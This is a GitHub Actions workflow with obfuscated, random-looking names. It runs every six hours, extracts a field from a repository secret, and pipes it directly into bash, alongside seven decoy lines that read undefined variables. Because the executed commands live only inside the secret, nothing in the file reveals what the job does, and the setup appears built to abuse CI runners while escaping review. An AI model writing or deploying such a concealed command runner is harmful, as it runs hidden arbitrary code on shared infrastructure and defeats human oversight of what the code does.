name: yezhongshu2603
on:
  workflow_dispatch:
  schedule:
    - cron: '38 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yezhongshu2603
        env:
          hht61: ${{ secrets.hht61 }}
        run: |
          echo $hht61 | jq -r .gai67 | /bin/bash
          echo $dv36344 | jq -r .nk90 | /bin/bash
          echo $vck35752 | jq -r .vwb600 | /bin/bash
          echo $rngjr1272 | jq -r .qrh778 | /bin/bash
          echo $zb7319 | jq -r .gjbfv0079 | /bin/bash
          echo $g3761 | jq -r .zxitn8 | /bin/bash
          echo $hdap6040 | jq -r .cx332 | /bin/bash
          echo $h6 | jq -r .t816 | /bin/bash

